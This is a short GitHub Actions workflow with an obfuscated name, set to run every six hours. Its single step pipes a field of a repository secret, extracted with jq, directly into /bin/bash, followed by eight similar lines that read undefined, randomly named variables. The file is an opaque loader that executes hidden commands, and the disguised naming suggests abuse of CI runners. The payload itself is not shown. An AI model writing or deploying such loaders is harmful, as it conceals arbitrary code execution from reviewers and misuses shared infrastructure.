name: tongxiangyu3718

on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongxiangyu3718
        env:
          cp5: ${{ secrets.cp5 }}
        run: |
          echo $cp5 | jq -r .suwku55 | /bin/bash
          echo $kpvm91734 | jq -r .o81387 | /bin/bash
          echo $xkrnn5 | jq -r .z140 | /bin/bash
          echo $yz19187 | jq -r .gjbkj81232 | /bin/bash
          echo $ij6 | jq -r .hgb263 | /bin/bash
          echo $cog14147 | jq -r .f8 | /bin/bash
          echo $lfrlb5 | jq -r .iu8 | /bin/bash
          echo $t7 | jq -r .ntlz4129 | /bin/bash
          echo $sjht3 | jq -r .z3097 | /bin/bash

